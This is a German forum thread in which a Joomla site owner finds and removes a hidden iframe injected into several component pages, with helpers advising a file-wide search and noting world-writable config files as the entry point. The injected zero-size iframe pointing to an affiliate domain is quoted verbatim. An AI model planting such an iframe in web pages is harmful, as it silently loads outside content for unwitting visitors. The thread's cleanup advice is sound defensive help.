[Mike]

Hallo zusammen,
lider habe ich festgestellt, daß sich bei einige Seiten meiner Homepage wie zum Beispiel "Joomlaboard Forum Component 1.1.6-svn" und der "zOOm Media Gallery 2.5.1 RC4" im Quellcode folgender Iframe Code eingeschlichen hat den ich definitiv nicht dort untergebracht habe:

Code: [Auswählen]

<!-- Main Content Section -->
        <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Aufgrund der aktuellen E-Mail vom Joomla100 Team habe ich die Zugriffsrechte auf Dateien und Ordner meiner Webseite überprüft und aktualisiert, jedoch ist der o.g. Quellcode immer noch vorhanden.

Hat jemand eine Idee wie ich diesen Krempel wieder losbekomme?

[driet]

Hast du mal im index.php deines templates nachgesehen?

http://www.free20.com/portal/index.php?aff=razec sieht nach einem werbefinanzierten Link aus, über den Affliliate Razec für jeden Aufruf Geld bekommt. Wäre moralisch nicht nett, aber schlau, wenn er das in ein free-template integriert hätte ...

Die zweite Variante wäre, dass der Link über eine Sicherheitslücke eingeschleust wurde ... da bin ich aber kein Spezi.

[admin]

Der Code kann in einigen Dateien liegen. Da hilft nur, die Installation komplett runterzuladen und dateiübergreifen nach "free20" zu suchen. Ein geeignetes Programm hierfür ist z.B. phase5, ein freier HTML-Editor. Bei betroffenen Installation war der Code immer in Dateien, die von den Komponenten nach der Installation mit CHMOD 666 oder 766 abgelegt werden, z.B. die ue_config vom CBE, die safemode.php und config-PHP der Zoom-Gallery im Ordner /etc oder der Config vom Joomlaboard.

[Mike]

Hallo nochmal,
vielen Dank für Eure Tipps. Ich habe die Dateien wie von admin beschrieben runtergeladen und nach dem String "free20" durchsucht und dann bereinigt. Betrofffen waren 5 Komponenten:
- Joomlaboard
- Community Builder
- UddeIM
- Zoom
- Index.html im Module Ordner

Vielen Dank für die schnelle Antworten, hat mir sehr schnell geholfen das Problem zu lösen.

Die Zugriffsrechte auf Dateien und Ordner habe ich gemäß der E-Mail vom Joomla100 Team aktualisiert. Gibt es noch andere Sicherheitsvorkehrungen die getroffen werden können bzw. kann man den Übeltäter ausfindig machen?

[admin]

Naja, die Suche des Übeltäters dürfte sich auf Länder beziehen, die momentan wohl andere Probleme haben als Hacker ausfindig zu machen, da sehe ich wenig Aussicht auf Erfolg. Von einer anderen Kundin weiss ich, dass sie Strafanzeige gestellt hat, evtl. ergibt sich da nochwas.